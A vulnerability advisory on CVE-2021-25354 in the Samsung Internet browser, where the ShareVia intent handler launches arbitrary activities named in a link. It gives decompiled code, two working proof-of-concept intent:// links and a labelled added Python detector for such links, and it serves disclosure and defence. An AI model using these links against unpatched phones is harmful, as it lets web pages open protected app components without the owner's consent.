Samsung Galaxy - Open Activities Via Samsung Browser

Product Android devices with Samsung Internet (prior to version 13.2.1.46)
Severity Medium
CVE Reference CVE-2021-25354
Type Application security bypass

Description

F-Secure looked into exploiting the Samsung S20 device for Tokyo Pwn2Own 2020. An issue was discovered that allowed a specific browsable intent in Samsung Browser (com.sec.android.app.sbrowser) to either:

  • Launch non-exported activities in the Samsung Browser application
  • Launch an exported activity in any installed application

Note that while this issue was found on a Samsung Galaxy device, the Samsung Internet browser application is available on the Google Play store and can be installed on any Android device with access to said store. It was confirmed that this issue could be exploited on any Android device that had the Samsung Internet application installed.

Technical Details

The issue lies in the "handleIntent" and "handleShareVia" methods of the class "com.sec.android.app.sbrowser.capsule.BixbySBrowserLauncherActivity". First, "handleIntent" does the following:

  • Parses the passed intent and establishes the URI "data" from the intent's data
  • Parses the URI "data" and establishes the list "pathSegments" from the URI's path segments
  • If the first item in the list "pathSegments" is "ShareVia", then the method "handleShareVia" is executed
private void handleIntent(final Intent intent) {
    final String action = intent.getAction();
    final Uri data = intent.getData();
    int n = 1;
    if ("android.intent.action.VIEW".equals(action) && data != null) {
        final String string = data.toString();
        // Path segments of the URI carried by the incoming intent are stored for later lookups
        final List pathSegments = data.getPathSegments();
        if ((this.mPathSegments = (List<String>)pathSegments) != null) {
            if (pathSegments.size() != 0) {
                final String pathSegments2 = this.getPathSegments(0);
                if (pathSegments2 == null) {
                    return;
                }
                Label_0738: {
                    switch (pathSegments2.hashCode()) {
                    ...
                    // The first path segment "ShareVia" selects branch 4 below
                    case -679124017: {
                        if (pathSegments2.equals("ShareVia")) {
                            n = 4;
                            break Label_0738;
                        }
                        break;
                    }
                    ...
                switch (n) {
                ...
                case 4: {
                    this.handleShareVia();
                    break;
                }

Next, "handleShareVia" does the following:

  • Creates a new intent "createIntentWithTargetTask"
  • Checks if the second item in the list "pathSegments" is "result_type_success"
  • Checks if the third and fourth items in the list "pathSegments" are not null
  • If the fourth item in the list "pathSegments" is not "com.sec.android.app.sbrowser.ReceiveWeChatMomentActivity" (or it is, but WeChat is installed), then assign the following "createIntentWithTargetTask" extra values:
    • "packageName" = the third item in the list "pathSegments"
    • "activityName" = the fourth item in the list "pathSegments"
  • Start the activity outlined in the intent "createIntentWithTargetTask"
private void handleShareVia() {
    String pathSegments = getPathSegments(1);   // second path segment: result type
    if (pathSegments != null) {
        Intent createIntentWithTargetTask = createIntentWithTargetTask("com.sec.android.app.sbrowser.INTENT_SHARE_VIA");
        createIntentWithTargetTask.putExtra("resultType", pathSegments);
        if ("result_type_success".equals(pathSegments)) {
            String pathSegments2 = getPathSegments(2);   // third path segment: package name
            String pathSegments3 = getPathSegments(3);   // fourth path segment: activity name
            if (pathSegments2 != null && pathSegments3 != null) {
                if (pathSegments3.equals("com.sec.android.app.sbrowser.ReceiveWeChatMomentActivity") && !this.isWeChatAvailable()) {
                    Log.d("BixbyLauncherActivity", "WeChat is not installed!");
                    createIntentWithTargetTask.putExtra("resultType", "result_type_fail");
                } else {
                    // Package and activity are taken straight from the URI without validation
                    createIntentWithTargetTask.putExtra("packageName", pathSegments2);
                    createIntentWithTargetTask.putExtra("activityName", pathSegments3);
                }
            } else {
                return;
            }
            ...
            try {
                getApplicationContext().startActivity(createIntentWithTargetTask);
            } catch (ActivityNotFoundException e) {
                Log.d("BixbyLauncherActivity", "[handleShareVia]" + e.toString());
            }
        }
    }
}

Using this information, it is possible to create a custom intent that launches a specific activity:

intent://com.sec.android.app.sbrowser/ShareVia/result_type_success/<package name>/<activity name>

The following example browsable intent link will launch the non-exported component "com.sec.android.app.sbrowser/com.google.zxing.client.android.SecCaptureActivity" in the Samsung Browser application:

<a href="intent://com.sec.android.app.sbrowser/ShareVia/result_type_success/com.sec.android.app.sbrowser/com.google.zxing.client.android.SecCaptureActivity/#Intent;scheme=samsunginternet;action=android.intent.action.VIEW;package=com.sec.android.app.sbrowser;end">click here</a>

By replacing the appropriate fields, it is also possible to launch activities that are exported in other applications. The following browsable intent link will launch the exported component "com.sec.android.app.myfiles/com.sec.android.app.myfiles.external.ui.PickerActivity":

<a href="intent://com.sec.android.app.sbrowser/ShareVia/result_type_success/com.sec.android.app.myfiles/com.sec.android.app.myfiles.external.ui.PickerActivity/#Intent;scheme=samsunginternet;action=android.intent.action.VIEW;package=com.sec.android.app.sbrowser;end">click here</a>
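The following detector is an added example rather than code from the advisory: it parses browsable intent:// links the same way the decompiled methods above resolve their path segments and reports the component an unpatched Samsung Internet would start. The flagging heuristic, the regex over href attributes and the sample HTML (including the example.invalid link) are the editor's constructions.

```python
import re
from urllib.parse import urlsplit

SBROWSER_PKG = "com.sec.android.app.sbrowser"
HREF_RE = re.compile(r'href\s*=\s*"([^"]+)"', re.IGNORECASE)

def parse_intent_url(url):
    """Split an Android intent:// URL into its path segments and the key=value
    pairs of the trailing '#Intent;...;end' fragment; None if not such a URL."""
    parts = urlsplit(url)
    frag = parts.fragment
    if parts.scheme != "intent" or not (frag.startswith("Intent;") and frag.endswith(";end")):
        return None
    params = dict(kv.split("=", 1) for kv in frag[7:-4].split(";") if "=" in kv)
    return [s for s in parts.path.split("/") if s], params

def sharevia_target(url):
    """(package, activity) that handleShareVia would start for this link on an
    unpatched browser, or None when the link cannot reach that code path."""
    parsed = parse_intent_url(url)
    if parsed is None:
        return None
    segments, params = parsed
    if params.get("package") != SBROWSER_PKG:  # only links addressed to Samsung Internet
        return None
    # Mirror handleIntent/handleShareVia: segment 0 selects the ShareVia branch,
    # segment 1 must be result_type_success, segments 2 and 3 become the extras.
    if len(segments) < 4 or segments[0] != "ShareVia" or segments[1] != "result_type_success":
        return None
    return segments[2], segments[3]

def scan_html(html):
    """Report every href on a page that would launch a component via ShareVia,
    tagging whether the target lives inside the browser or in another app."""
    findings = []
    for href in HREF_RE.findall(html):
        target = sharevia_target(href)
        if target:
            pkg, activity = target
            findings.append((pkg, activity, "browser-internal" if pkg == SBROWSER_PKG else "third-party"))
    return findings

# Constructed sample page: the advisory's two links plus a benign intent link (constructed).
SAMPLE_HTML = """
<a href="intent://com.sec.android.app.sbrowser/ShareVia/result_type_success/com.sec.android.app.sbrowser/com.google.zxing.client.android.SecCaptureActivity/#Intent;scheme=samsunginternet;action=android.intent.action.VIEW;package=com.sec.android.app.sbrowser;end">a</a>
<a href="intent://com.sec.android.app.sbrowser/ShareVia/result_type_success/com.sec.android.app.myfiles/com.sec.android.app.myfiles.external.ui.PickerActivity/#Intent;scheme=samsunginternet;action=android.intent.action.VIEW;package=com.sec.android.app.sbrowser;end">b</a>
<a href="intent://example.invalid/open/#Intent;scheme=https;package=com.sec.android.app.sbrowser;end">c</a>
"""
```

The same functions can be run over crawled pages or proxy logs to find links exercising this dispatch while a fleet is still below version 13.2.1.46.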

Remedial Action

Samsung has released Samsung Browser version 13.2.1.46 which fixes the issue outlined in this advisory. F-Secure recommends that users upgrade Samsung Browser to at least version 13.2.1.46.

Timeline

Date Summary
02/11/2020 Issue disclosed to Samsung Mobile Security
02/11/2020 Issue assigned to a Samsung Security Analyst
12/01/2021 Follow up sent to Samsung
17/01/2021 Samsung confirms the vulnerability and rates it as a moderate risk issue
09/02/2021 Patch released, Samsung initiates process for bug bounty reward
12/03/2021 Bug Bounty Paid
25/03/2021 CVE published by Samsung
26/03/2021 Advisory published